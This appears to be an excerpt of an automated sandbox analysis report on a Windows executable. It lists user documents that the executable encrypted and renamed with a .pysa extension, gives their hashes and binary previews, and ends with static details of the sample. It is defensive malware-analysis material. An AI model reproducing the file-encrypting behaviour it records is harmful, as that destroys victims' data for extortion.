....!...5S.L.0.JB.(..6..A"P.;.j.h..o.Z6.+`..v..8X.+.....k<"..(.{.=n1.....waq...?....IS....t...>.............#.Z.....I.a:......q....qQ.u..M.......C..05..:..j..z..t..D.B...7...................7wc.x..3..?.[Y/FJT.....hIC.=IJ:....O(...X=0l..K=/._|..Af.xc.1..)..........S.6....<.....K...n...c..V..L.....[y..\f......e.S.\R....}.zy.....r....MhFu..gq.;..?k0rs..3D....B&........K.2.\.......#5=qj..0....U.!....|?
                  C:\Users\user\Documents\ZQIXMVQGAH.docx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.061433760447581
                  Encrypted:false
                  SSDEEP:48:TPNpv56ye7tPOfbjgN043FDTbRPkdTU4MFrLwxrrNF3qSusMmGfHiMfzNjAUV:TNpR6ye5PYgOwtbRFBUxrhFaSuRfHiMV
                  MD5:2658153C120C1B7FD4139EA684D0CB94
                  SHA1:61FC7C9E1CBA72AC1035679BE4F83310AC0D3341
                  SHA-256:D01D5E08299DA22E1F1582AB4D5CE636A4D6733D9DA7DFA91513EB33F7D30DB1
                  SHA-512:63B66014C408773BB3EF7CDCDA0C30A73F5D10869EFDCECBE772B97C44883DE00B12418B730E19CEE0E31C1FFE58AC54D624E25233779F583BC8605D387F4B6C
                  Malicious:false
                  Preview: .0..&.J^W\;,....^V.[@H.0F.~%...o.s.....b.....O}...V.#.;.zt.....]M5..4.V...%\ y9qp..%(..q@..>G.....<..[.I.....Z..L.\.......y.._..q..Q>..c.....v.O..HFO......C.`~S..Pkv^M.....K....=.....J..S...4..P...o...\....w.C;d...@.5.<..p......4.d...gy..Q.........'C..#.|tQ.+.P...r...~.4..s.T.....O.h..Y.7s.41[..l..p .R.2.RK..;c.a..k...T&.............Uf..#&.(.N..2...f.Xo.e..0....[.o..6..L.....`5.......U.$...al./8..V.3...!G..>.......O..t...B.4....l+j..Q..B.'.2W/.L.r...Tp.z..e...8c.....\b6.'Xw..._E.bCd.>..w^+.#.g=q@...........1MV..9...^W.i.K..4Z.x}8%.2......P+O)..:2J.z-....w...m`.._U.m.&I-.dg.@.........I.|:. &...9q.....$d...O.cH.....,.j.S.^.I.1..'t.iNm)%...+..PY..E&..z..I.k.,.........L8.....,....-.@~f!HyC..zQ[.~"ghN.....pf..a..~.fh.B...,.j|....f-..f".j.G..p[.X}.+..2.F...i~Nm.5.{`~UA..L.U.@L...'..U...=.M=g....-.Z..0,..{(.....y.7....5.$.<w96..6D'.......J.U..=KU.=..2P~So.nQ......r..Ch.. .@...nR....j}W..}hu..w..>...z.c...v.W....8.Q....m.....6=.N=Y..>.f
                  C:\Users\user\Documents\ZQIXMVQGAH\GAOBCVIQIJ.xlsx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.062448156964265
                  Encrypted:false
                  SSDEEP:48:oyf6w0CNu15y7hslFMIGWqDL40BTeWZPnfONoqxwir3qYt/rvldEtTLuF9y/BSlu:5Sw305atIjqDLHBTzZP7qxwE3qEDABLV
                  MD5:0C9B4142DB822B18359728598E4C9B60
                  SHA1:AC0231B4C0D63133F835CB80A107A159D35A4808
                  SHA-256:8391947E232CBC15D657FA416ECB69EB4A42505B05F8D6D79B0924A171A27DA8
                  SHA-512:F70A2E3BC59B5851672F6CCC86B59977702E523D007783E90E62C93DA7808930542433C5383CDA527CEAF5177BA55A942AC1190C251D1DF22CA568BCE9F81DA1
                  Malicious:false
                  Preview: .7...N.N...XL.~.j.f..T<=...i.;&u...X.V.....<.$..m3i.a.HH..7.E...w. N.F)k..iP.T/.!.UI..<,$....;.._...o..(VT..U.'...Mj,.)..KI....5.k..V.:..=..'Ez..P..]...q>x.1..a..T...Q..E..}.B.&#..6V@j....O.]....t..q.hy`.=/?...o..+..G2........!.%..HPAi...$.KRF.v).Xg:.....sEk.P.9x...z...C.}...oSy.>oSq...a{5..}O.M[n.s.....o..^>...yG......K.*........7.R..D...'+!....ll...hS.DE..@. (h.`#.p...A.........G..1M.....X....q........`....i<n..3.`Vr.0E_Y..z.."...........`h..?..{......'.P...}...[oso.".'?.>....A.,L.!...zu6...vke.T.....D.Z\iD....D..Hp.6n.v...Q@.fl4F....(t.".#....T..F.V...(.*.`o..z.x..e.....2@8K.s;c.....3...n.q.c.#.......X...^*.....X. ..E..7.z.3a......p...M..........TEz....]-.1&...[...P.R/.PN...qi6...|..oT,...t.\.O;...b8.)..=Po,.3.^..h....w....f.{.{..\.3s.]V1kSu..9......7.ij.>|.}y.../...a.J.V...69....h......~.)W..m....?.~..2.....%mr......jy..Y..%..M._.....j&s6U.^.z.b.T.?._.......1.U.i....|)....y?....c.l..,.; .d.....v<s.?.{.5.C.p..b......Q.r6$._j.ao.4......P
                  C:\Users\user\Documents\ZQIXMVQGAH\QNCYCDFIJJ.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.061333515296922
                  Encrypted:false
                  SSDEEP:48:lB9zqqKHuYf064o81TrVWz2x0rNTASqIosF9XvxIDNp4vq/7C6PjxrYDyGxaxLNT:RGq6RWzhx0ZNrpjjq2wjxrYDjxa9TBWA
                  MD5:3403C075CE577CB680B739F261593480
                  SHA1:42233EC5FDC838F3317E35607A6A156CDEBDA6ED
                  SHA-256:A4B58D6069E0ED5043E96F9C1D0F7EA4855C1144076B6EC9421CA001833DC976
                  SHA-512:061B17122EDFC2D5CB0C8770B846C3112CCBB538AFCF2206128705D9108BDD20F3D0CE97C1FF2BE5B991B19D349DB0936A2A11EB3783D8D6D3C7027B16CB8FD9
                  Malicious:false
                  Preview: ...9.F..j`P..u..].....~..vn.._.%..x...?\.^lq.)z.z......|.d.m7.....X4.fq....>.....?X......v.K.....v`.Y...?.J.......[.....G...:.)..$..~5..A..._rodEi"n_....z..G....[.`.z.W..{D,.4.6Ey.s.J,..`....%.L.ve=+....0'N..tJ....x.@........=.\.9.j1....g._...l.y..i....t...tAP..<...?.....e.2.?.......B...W.o....l..[V...@b.{t..4.H.@.R.^'..7.kr.L...'......>.I.Z.*..#..[q.q.{.$..<a.r-..~..&.|=.*.....<%VCc.J-Cv....QP^.M..M.9....='...S......%.1~4@..r.....To|^=ussO.=..y.). ...c..u..0?...y.r.]Y...R...7.l...o....DUy..MM..L..........h...o{.1......u.3.}..".......tc]+...f...on..3;..k..|......9.PT4...*.I...#.... ..}...ve..^....$.=.....Brs8...>....c..%....:Y..p.{...3ieF2..u.0m..%h*..N..\Iex6......eo=.a.G.........ei.k..K~...7u..|.)...IR.... 8.[VyP.P.....A-D.bUh.P8...C#......h!.<...D..m.|.......0..?H..\..TW...9.da.1.0.k;...:......?%[]H".e..x..F..<.H.0..N...B5.{Z.._).V\,...2h....IjI....{.s..4....v.d$..'.rd=!y...#x;..B2.}....f)F~....$...i8.i\..`S.`][K.S".
                  C:\Users\user\Documents\ZQIXMVQGAH\ZQIXMVQGAH.docx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.045724417012981
                  Encrypted:false
                  SSDEEP:48:gF0LZzTCf4s8CnKAVGcOAAv5T5pK76k+EmKhraeB8N1jUvso9sPMV+YSimIoPo:o+Jbs99VGOIz7EmKpaeB8HUT9QMj6IoA
                  MD5:3D5F42EB125A018E979CD9F3758303B2
                  SHA1:351B01EC7C3F34FA50511381909C6F88FBD4EC03
                  SHA-256:AD56F19A40F35AB5606ADF7F2926C7E9663D2A987CC96BC917039671CC9D54AD
                  SHA-512:8470D97DB55C51DC7589084866E2FF3564CCA6184646056F8EE04519E2C55C42BB425DA8D033B5984ACECB1F84CB74EC9DEFE5671C2D35DA5DE2C55A7710C6A0
                  Malicious:false
                  Preview: .|...+..a?>...a..[..U.L.....u36"?6.......T..J.z.].....[.}..^~....</c+.......WMG..'..]..t..z%H..:.9....LHU.....r...*..7.yf..').R\............W+.0Q.3._Su..]...9g..?....n.5G..._pF...D.Cv....,.r.>..2..xiL....i.O&....>g....D...a+n>.U..a[.^.N{.........0.f,...m.....v&...9`.."..J.;mTn......!....M..F.`y.r..<.>.a...Y.....rS.`....EMR..p/(.....\.y....<....I........dx*....Bv.....<^sF...S....:....^.P. ...T95{.v.@#t*...R.=.FS..+..2..t..T..L.~..,..b.r..<......N..X...>\RMM..^\9.j.Bl.vq4.B..+...6H.{n.k.0..1....6FY. ...z......_jx......0.|.f.2?....E.9.A.Gzo....x..J..cx!.....N..k6...9..B.j<q.?k.....J-..... .G.=).Aj..@......"t.CQ).b.....b.|.o.,...+Xz.......d...G...N........0Q..._J ..wZ"g.Kp4Z..}^W..Dl...e.TArL1.0]2...h.B.,..G.._..]..*.'...}....Q...HV....{......5.$$b{.?%.l(D..A...c......G.i...h....*...,.9......v...@..4..q..j..M....9.}u.........%...\...ynUg..j..W:<....r..X.i........a{.;.i2.ka.QaxUz;F.Z.._..6! ..+B{....m.x..... ..g.0Yj......<..+.'...m..UT...
                  C:\Users\user\Downloads\EEGWXUHVUG.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.060164470968638
                  Encrypted:false
                  SSDEEP:48:sgZcxqsRAUOA+psvnIdVLaq9BOXtdKkoy3PphX0oGD1KQapQG+SCTgPGN550t:/cb6UyVLNjOXtxPphkO8G+DTgPGG
                  MD5:9DCB0C29F5E63F2A34036A238A77DF50
                  SHA1:81AAD5B80E78150F1AB9C9E5E0446F4BD966D131
                  SHA-256:03A0D3297F8489DECDFD95765577FCFB39EC735EF1E0CCB34A4149ABE0F4216F
                  SHA-512:6686C889A7AF767C17BD763CD3C920A2B6CEF53492CE270D11B8A1B869A9703609FCE0A47B1DB6E82BE78BE6D356FD66AFA701A86C2010EBBB9C29DAEAC5F1ED
                  Malicious:false
                  Preview: .O.S0T7G..h..SK3m.y.].Y..."..../...'$..'.s~?........&.r!.I_.%^5o..Ye.......2......../.9.^...:....@...#GYG_!\.[..L..>..l..J</X.7..Q..0.......G.5I..s..$.....z.1.......U.%t..l...L..4.y..JTCY^...M.....m.d.m..1))...+......w.88!`..?x........V...a.hk....,...NY.I..8...+kg.. .r.-.:7.:>...J$.v.]..."f...M....2*.3R..u...r.....b..G$...!].F..d.4:..0%2....~#. ..Wx...$.G............qq..{.f@....cR..H.6%.h.-._.m.v...!..^.b!..4...%.../ .....Q.'.....Wb.&.{|.k...+....JLH..!.S...|..5....fYL;.....P.....k.Y.hK.....bs.re.2.......,.&..?|X..h]X.........w....T.7TyZs..".N.tnx<r..l....s.o.6.~W.5}..*3..H.B.qV...cR.Ml.].D....)W...6w~%...}.....}.....Q......8d...M.x.b....).xF..s.p#dn{#:h\..U.X...*.v.......9..f.......#.v.U.K..\.`..N.Zv.X.!|a......g.!\V.@.P.,......&..[.a.02@3...B...'..Z.&..<.CfpL"=/..x.....8N ...#...y.....nZ..j.BN6'...b.=......ne..|.w.Q...,,2;?.RN.y5V_.vr..7z.@..>4....L...1zp...F....h...)...q..H....qk........<.3....B....v..h.Q..`.Dv.o.<.-..E\.%cag.1...=
                  C:\Users\user\Downloads\GAOBCVIQIJ.docx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.088720100204866
                  Encrypted:false
                  SSDEEP:48:fe++2Rf4aDOUZUx3yVWBtDyjjlFZUwa/Dm8vHtINvhTs3QWpbrafveaYpjd2M70R:W++ywjAS3ejjLZVk0vhQdNGxu2MQLlf
                  MD5:5FCF379866B00243D4FD729FD5E06720
                  SHA1:D66E67ECFF4714A40843D72D4A124DA537A2A2E3
                  SHA-256:3716392C1B2DF5939F7F72A05236ABA321DBFDFF9C6B6AB9C6082B471D30867E
                  SHA-512:78AFC669B1D7FC0018B3805D061D81F1932502E4A69C84589ED71EB43BAFF9BD80ED179FAEF84A67AF242E64794EA6B1DC89A84DADB3A9DF469A7E55695031D1
                  Malicious:false
                  Preview: ...O....U.#.%V.f.N.O.."l..pM.Y2.RF... ...3...^`.J`}.....K...g.2*.c........Q..K.v.........G.....E.N......:..U.g...U...~....WB(..e...F.g...8.\....,...cb..Q?.'..;.._...]-w..iR.b$b.....,s....{..W.jq.e}..(.X. ..%:.../p...%.r....3...$.-S.n/........L,o.d..)u...V.:....4.n..r....?.k.....z..V.a.2...&......}a.......oY.{?S.]U.OdD.i..G.3V.Z...my...}..;...:....RM....4(.w..R.;c.\~.Q...{sl..>....7U...Zga.....e.YP)`.......D.H.L..n.>.+..^..@X...4$.g.)>.E.....f....m......!x;=.....-.......-.`..?,......d.,]u...I.vM.G&.8.....1{.".o..xp.Ob.Z..>.[.*.3.2..........b..%f6O...="..H*f....p..P.....o..&B.5*.w..9..../.t....T..6...6.............>.5r..;.....^....J.K5.V..]..yCo..O].i.k.d2k....d.J2! ..R.[.,..];s%Lj........D..9..g>.L$.. ..:+>.X........|....K.@...q.r_.}7.....@n....m.".^]..@~....{..W..%.......v.F1.Q.*...._{..b.....(.0.....9 ....`.a-...3k.a..{....N..q:..\.....iOT*1-.?.]*.J.%...^N.=... N<.6..z..+q.~......g..I.1A....g....K/..b`....R.zS..V.NU2}t7..k...t...q.j
                  C:\Users\user\Downloads\PIVFAGEAAV.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.0555455714407636
                  Encrypted:false
                  SSDEEP:48:nQpLlZkwLNwlBXY1bOQpgp83Q6dXS/60FUE+nJFrkJzswoPyVFjtNFzgSSiZ2ctB:IlqwLcKNLRFelcJkTnVFlzgSSiZ2c24Z
                  MD5:10338FE64063C1A5B22B6EEF5DFB4A4E
                  SHA1:BE04EEA31143F5797D9286D47E0E496B81BBF82D
                  SHA-256:9A9F8DA49F321CD8EBA1648F1C3EEFFEBF1BFDB10A317DEC1BEDC4A3D2BD3F3F
                  SHA-512:4469F54F19379930C985D1CED7937C0E5A16647CE793701856C606C919241B610838311E5980C58C4EFF1F7F54395DC12114AE79B5D00BE0237FC5CD63286DC6
                  Malicious:false
                  Preview: V..[BX...t:...V.Hp..%E.6V.$U:$.wG..Z=...*...j...F.S.H.H.V.0..{...%..k.x.e..+..K.C..&..ugU..G.?.....*....D....8....t..?.x.u.$;b....H...\.B..^Zkh..*....5.%..d...5)nec..J.......-.^e..I%.HY'.E.......E;......;.6f.2.....k.........0.W.u..}.........r.o.A.x.;.........~vN.^UjU..T..t.@._}....e..|...6..?qo...JF.. 8.9..m...LnLs......=.......\LA...}f.'....SZ.r....?..\YQ.e|.s56..bt..H.....*U....ky.u....!R.*\...p...c......u....n.U^......w0$.h....p...,..~.p.h...&.o.G.y.ra.5b..QR.w....i..q.(..1.8.Bp.fTS .......D.v..[...`W.?..5c..^p.N......}.g.+V.i.....-=].:w;i..36.@..)...9...J.Q....P.zm.......J.!:..>>..z<..i...J..?O....XH.f.m.4...9X..A..V.....b.@.M.|......"..+J.I(.n....:..+E....+.X..I.....'M.S..[..W.4S._D...!qu.;"H1&.}....p.......~...vbv>[$..E.LO(a%.l.JC3.0V.].H..O.=...H.1.{.n.]..5.q.L..I.$.-1@..8.2.!.[.......Y.*.X..PeZ|!.,.K-.O8D4.{Z-\1..(M....J.....R.2...L..gxV.@{......sc.b!?J..+..<.......7..B..J92..W...L.+LS........{ ....Qb:Z....$SE.n...i..m..%j.H...jo..wG.
                  C:\Users\user\Downloads\PIVFAGEAAV.xlsx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.0634603739152215
                  Encrypted:false
                  SSDEEP:48:pximc+fgsLLrrpGUgNOR2KzrHBGOXbt/Q81KXrBxzdGSqIkhyS84iqfFg3D1DHG1:pxim7gg/U8R2KQOrHK7BxzdOF84iqy38
                  MD5:C6DC52AAF5B80D4E17B6970C4C8302A1
                  SHA1:03FE8F9E3A7A4FC661621AA8F169AFA35D819E4B
                  SHA-256:1416FE3339E57869C03D98B85F694464006BFC0EC201F1473AB71CDA7BD5B6D4
                  SHA-512:3D5EAAD05BB9922327C2978891674564DF076433F929796D841C7342176C40B254D46E87083F980E0ED0D4E1579D9842FE3FC528E94FE4842D84E2E9557892E2
                  Malicious:false
                  Preview: .Q.5...H.H........(.o..q.;.....+..k;...<..7P..?S#jQ.N....g.F.....u7..:G .l.J.p..q..q..\Go.c.......3H.S.\wV.H.+......=...>...xU|_.ne..k.L..5...u..Q..p...:2.....)f.v..&9.^.{..G...1..0x.P.U..ln..y...M...q.e..'. .X....f.......=f.'1L8..)|.D.+.1M.!..9.(...M.....o....U..G..?.$.c...<.v..N....#...b4......3._"^`id.......+]_;).3...._..@..b..E#.,..Iuk...(G..Mx...M..o(....6.b.....4......F6.;.I........*..p..C.0,...`...)$....WY+..j....f...Z.R.....k...o..P.*f....."..WnfO.\.i.6.C.dnR.h.R....:a...]h6.e...4u]<......#/q....>1.>.@..L......M(.`...(....QM._.mL6.0..!q..+...9.-..........+.......V...j...C......j.. .=o.Z.d..X. .....l.....yd..Wc...&l1.. ...!...q.i<%.`be@...r..t.....]..).[..{/...H..r=.z........<....8.zUz..._:V...I@....-.X.L...P.x...[...X.*.&A..`.D.*&.X>o#J...R..2ZLH..8.q.....n...Y......&........(.j.^.=-...z0d..*.V9........'.q.[].h..."@'.dh......!J2.q....8... ..g."!X....#`:,.z.C.<...*)R2&...-..:........B..-.7o...)....B...e.f.....i.P.}.
                  C:\Users\user\Downloads\PWCCAWLGRE.xlsx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.059467926055534
                  Encrypted:false
                  SSDEEP:48:kKzpvpuvplDf0PaGH+pfswU9PGWG4PhBKZ/4a+mqZPdgfYqxQCOyPKcubuXUxvfa:lpv4lDcPlH+ps/9PDhBKZgtmeV+Yq/pZ
                  MD5:EBAD93517DCC81639036E2AA77BDB254
                  SHA1:1826A35BAAB26330559FF0BB9E5004456B9EA96E
                  SHA-256:2EB674BD717F4EA74F1CA6381E31BA913E11693DD97556288A1D4255A4A12861
                  SHA-512:F9691832B069CFBDFE69C178B538436EE61FCA84FB68CADDDB29DDCF82D5373EC8D7FB56EC10FC506753AB4AB7DD5C12B3A3AA134256417C194DA56F80C8E4DA
                  Malicious:false
                  Preview: lIo.....[C....v......2"...t.:d.J.F)..m.r.aL.OH.P.f8.;1...........U.z.......]...lN=..T..FV..4....l.KTK.Epn..v|.t...Kn;....G@...%6...S..+.........a.&..H....&z..6..."\.U........._.o.%..6..6.v}.Ii..S4DL.......Q$.Z.(."......?N$t..R...,.I$....Z.i;......Q.....9.XA.+.x.~.n.wT...D....0....8*L...H*.m1k...^..:....W...0 b....s.$...3.'..Tgr....2l..w...6..S.]\.` ^*..Bo;ZD...?G..T]#...D..q.D..._.!.l.pD;..Z...-..Rj...>;...*......0.%.S.....Mo.aqo...;.......M.no....0|...q...V......Q...@I...Z.PE.l...z.Pc....;~.+....w.....$g..s......5=moZ...`Q......<qO....&.....Q...m.d...........M.X.....&8.vc.#..{S...+..c. ..d....D..6:.W..v.M.J.....\.#:.M.@B..2ks.-2.M.=?Lj%yz.V....(Mm...d.k...k['......#)N.d....z......4?ZR./.F..:]....Q....nC.Z.+....4[... .$..k5..#..DJ..6<@..k....q)!`n*.N...:....%mF....!....&...>.[......I...^Zz...{A....C.....].#..n+Pp.;,XoD.V.l+.T..a..8w..$U.d:.......k. .=..>f..|...6U.7..a..U.2......6...tsQ.R\.<.)Go....aKH....7.*.G.T...@.f.i...........T..&./.
                  C:\Users\user\Downloads\QCFWYSKMHA.docx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.0329710516782775
                  Encrypted:false
                  SSDEEP:48:04HxbZlZtNGewlc8O0w+6r3Skh0KhkaSUdUndsmrKXVe6OjDvRh7Za:xHdZf2ewlC9Skh04kJUd2d/WejR1Za
                  MD5:A7D9F034DE6E3FF28D2A2EF1C9EA7F92
                  SHA1:130964FB1B94A87F64332CE7654059207B127836
                  SHA-256:BF866FADECCBD66C60895C611E9F56AC0D090597435A43667B44F0A3E52A84F9
                  SHA-512:65E25827C89245995F051CC7236D413F18CB13610D2D36B0AF2CA37BE088CEC488CEE51B49076881932EF2202661B393CFA6C6B647F59EBBFE78BB43D1BDCD97
                  Malicious:false
                  Preview: eN.m..@....&....q..........B.bG+K.K....c.n.+.;_....@...+{n...V4\...z....F...V..4...b.w...22~.95"._...~w.T.M.....l.y...........J2..X.Jj.......-RA.J$...[.m,...wE.N....s9f..f..B....f..=..m|.B..o...Tw......*.6..#....x..@.x.FoH...\.Cra..n.zG65a$i.q.id...cdVB.c.'.%....E1........u..._]*..`..iL$...k.V....C.....zw...Owq.._W.J.~qX.&6..iAm........3.r.O.F..7...U.........y..uFbC......#{.&.,...)...P.X....$M.R.~..FzJ2....M>..........|6 .I."(>.2'..]..(Zhf&.+.7,....u.jj...............Q..Z()...g!..iE.:. ......r.4.<...J.<..[..84..l1K..iW,..c2.A...^.MO?k..$:.{........].a.r}*>..W...,n...,.,.g.S.s.!.{:.. .(..(.23..8..>.!......H.e+p.MvH>.uo-a........._.....r.d ..nH2d..i......\...[......).07.............o..eM.;..k7.E..A..4~.1.}...>0..|.J.Sb..%*....w...W...5.......].C...t...j....@.Cp...y..4.$..CJD....;..|^3(.O%O5....R..Hi. l.....Fk.8.>=.sn}\...K..69!a..6.w...F.E..1.T..."....3...r..J`Xp.a....`.^.......v...(.`-h...7..Q[.G..Z....5..Ow..>.....f[.
                  C:\Users\user\Downloads\QCFWYSKMHA.pdf.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.041800424888822
                  Encrypted:false
                  SSDEEP:48:wi+J9DDh3Ugn7tM2686p67lBFuj5ukRuJu/EFRXln5CvewBcRK93XbYYYZOrEXeb:tyD93p7a8eMwUkRukEFRXl5oewBcg9Hd
                  MD5:FD135663EDD4987E1CB40B8EAA5023F7
                  SHA1:7CFAC013D3048DB5D2797CCE44E2281D2D7579C0
                  SHA-256:580E3E2421ACE71AE836F52A2DA21D8060E194165941FE4AEF62FA9A990F1014
                  SHA-512:2AA5986181C6CBFC018C853FBEC353C4605472CAD0C8722EDF4EE00F8D3D6110EF654BBCBB69846801947DCCB08169A6C6245ED982E8D94A3EE93BFFA26AE04D
                  Malicious:false
                  Preview: ...Ica...P.....MP....W..$j...+.Q?...Z%S%..$.<_..PW.d.(|5.==.k.>......a........7e.k?.$fC.z\.V).......APW..y..\...2l..a2. .Y...!.8.`..T.Z.\f..T..7Z ...@.}......[...O....8.n.d.b.0oY..E..n./...w.....I....U@.1$..ul.7....H&. .!..R'....N4l.....n.0...Oc...Z.y....w...G...\..*...E|!..C.B...c@-....`...7..U...s...].H.4p.c.1.mL...T..~.W..b..-g9....j.^A.lg...mY..4M.0&)....m....0.........P..L./|...a.../.e....6.>..-&'..._.....=;j.F.pHU......a.........I}B[..F..&<....-......C1)s.]^..u...Ai.0.'Z..B....O.?]......5.9!....w.@..T..............@...|..z.....9ZS.j8N.....W...r..z..0[7r_......T......[y..&g.....$...e...09*......n.8).#.u.s...@l....}..K....F'..K.....`AW.9w...*..........?...i?.y..I...qU.6~9.....9.v...K...z..?.P4.H,Ar....Uzt..z.5.m.F).."$.L....F...t.[..6{...J.o3-:.z.."8.?-.........^\..m.#....q.+e...9.......r...Q..?D1.ga.2F...R|..w^.@Ci.D.*.....}c..>/.nF|....tpw.J%Nn...Ao..G..Y<vx...W&y....`.+....r........E.~.!..2>.h./Y....!.&jdOZ..a.1p...fF...{.....A..r
                  C:\Users\user\Downloads\QNCYCDFIJJ.docx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.065408969582556
                  Encrypted:false
                  SSDEEP:48:ynxzSPmwouqiHQSQ7uA2RemMiMqD9qMXoV5trrFq1N57Z2lCZwxeWua05WY7oOSq:yQPh5HfQ7u3RZMi2HzRq1N5dQCSxeW45
                  MD5:AF665112B7ED19B37BA6967A856269E4
                  SHA1:297314020BED1A9C46BAD7919F39228FBBAF4EE8
                  SHA-256:0FAF9C18CF1FAC4F8545B23E460633766E34BBAD0DDE60614C22F002D180B1DC
                  SHA-512:4CFBF119D0496E4EF39281ACEB372BA39C5D6C9899CC352972B0B39AB7DFB88765C10868C15B77E5A1ACBF1F4EB86DF93FB2DA0F52A6C8B59F8D50912C90BDF4
                  Malicious:false
                  Preview: ....j.I8....D....6s..E......&.[.x'..6.Y.y..Hq..../...l I...........k....F..f9)K....&~%S..+........1..L.F......C..^I....$.l'......8.f.......Ho.....k.o.8..U....E./..N..eG...G...pE}....?._&..M.6..z..aF.W.<$m..`.$.z.<...U.{c.&..n;....3...}...>....].ol.N.....tp.@.L.d.Ep.N...Pd.....3x. .e...T...q..[.@l.c..=......{...H..~...G.y..M....?01.|\.jW..5..{z../W.X..*.....Y.....>p.......U....G....O..O.BY..K.6=.....Ph~..X.WT...y.<+.e.4.0.>...6|.B.'...N8...W...%....U.G..[...........~L.l.l_wI.9>U...=..'....D........-..7.q...o..Y..8.\.u...cvQ.VQ..D.w!.'....pzTj.b..7.I._._:OL......._.W....*Oe0G....-..a.fH.U.......s...c.....W.........B..EU..D.........v.\.R....?MW.=..y..P..".lQ}.?.(.G...9..:.xm+V".q}...H.(P.ssc....*.9..........1v...&........8.>!.T...............WSWzL...9..._..#......C.....b..4......v`..Qh.yA^...8.Zu.N..E..!?#.....][.....u.][C..Ws.FVi,|..p.].i6.I.....kb...B....c.L..&kn...C_.Vk...:...W.....|i`.7.l.|,.........U./.9...F.y...X..:aX..t.|.dm6..
                  C:\Users\user\Downloads\QNCYCDFIJJ.xlsx.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):3072
                  Entropy (8bit):6.038522212411196
                  Encrypted:false
                  SSDEEP:48:gyqxOCqnlFZ2kEYRh7ODitzl2QMi8azYNu2ePlzLDVgS2maHW9U5D:gyqc5nln0qhqD0R4aUNu2SzLDVgvpB5D
                  MD5:D41472DBEFA1398315B8D98792F25298
                  SHA1:07C82AF84DDC62FC540F18C3C60F3125EF819B99
                  SHA-256:68531BDF0181E055C71BC6B45215D2E7F60A1EE928C3700EDFBE3854DC187915
                  SHA-512:B57A56C4DF9BD252AC55439A413900B0C2E54C5D3C1AAEE90A46700C8D427FBED194DF00A09C368E597158CAB43DD34BF23ABDA618F29E4B1C6B01886D5B88EA
                  Malicious:false
                  Preview: 2..Y.Y..`.....l.)6......YkD-.-.`......1.bV5m.......e.|K..&......G..QMb_p...A.WSi........s3.......N_...n....[.*..S.Z.M.......=....m..1.@-.....).S..G4...N.-.....!..H.D3o.$.(${H..[Na..Y|1.v.F[.....]J......kM.]..........nl.,......Z.3..u.~......)...d...Pr7..wT+....f.*...k.1.4..f1.c.Y.:R..P..v.g...K..,]+l.9.B.=....~w.xN,mI....z.~....d.w#.q.:a:e.1...~.5.bblW...r..H......VG...u.).~],oMM....N;2W..*.H..+0.Q7...O.5..l.!|.Eg..O.q...mlI.?.......I..Kh...R.x..-.a......HB!.Z..,.....8htW.3..)$.C.>.erY.\.&C]o.k...g%.d.!_...ta.WR.'.h].r...;.0[>b........I.Q.B..u...f#....b......."....n..1.....~.c@t.g...DFT.......1K.Y......U.C.".j..3.Er^_..h..o..t..6....f...h.?.=...&Eop....:.......]......[...]Z~]l..8......TD.-h4..~7.V..V.c.._!k*.dh.....#.n..SL..9WA9_J#.<.5.`M.Ehi.II.\....R...Ri..FV...La..b..|....dL:.#..%[.y........r..H..y.A~hD.f.d\e.x.T..=....4..$~.\..^....R.....M;E.c......D........N..c...?H=.=......WL+.&..H\%A.@8~.......b!M..^../LcnI9}.V...`.g.Pj.A..j#;..!$0...D.>

                  Static File Info

                  General

                  File type:PE32 executable (console) Intel 80386, for MS Windows
                  Entropy (8bit):6.650740182139938
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:6hFKK8UQi7.exe
                  File size:511488
                  MD5:b6dd099b4c51edae5ea0c867ff2f12a7
                  SHA1:f13800d747ca3d79785f373af3ce098a0298a6d7
                  SHA256:f0939ebfda6b30a330a00c57497038a54da359e316e0d6e6e71871fd50fec16a
                  SHA512:5ada31af3f39f37fcd15b1afc3ab9f6e60fc47d56097130ac2c8ea734f1db1ce93d552014abeb71ab0235fa65d9ed7b2d9c5cd0367acf99df6d32f138cb3d8ec
                  SSDEEP:12288:kXwv9fG79H+OeO+OeNhBBhhBB+BRW3aHhIBipMbDH5sFUJ:iwv9+ZBRW3+hIIpETSU
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........$...w...w...w82#w...w82!w...w82 w...w...v...w...v...w...v...w..Aw...w...w...w...v...w..-w...w...v...wRich...w...............

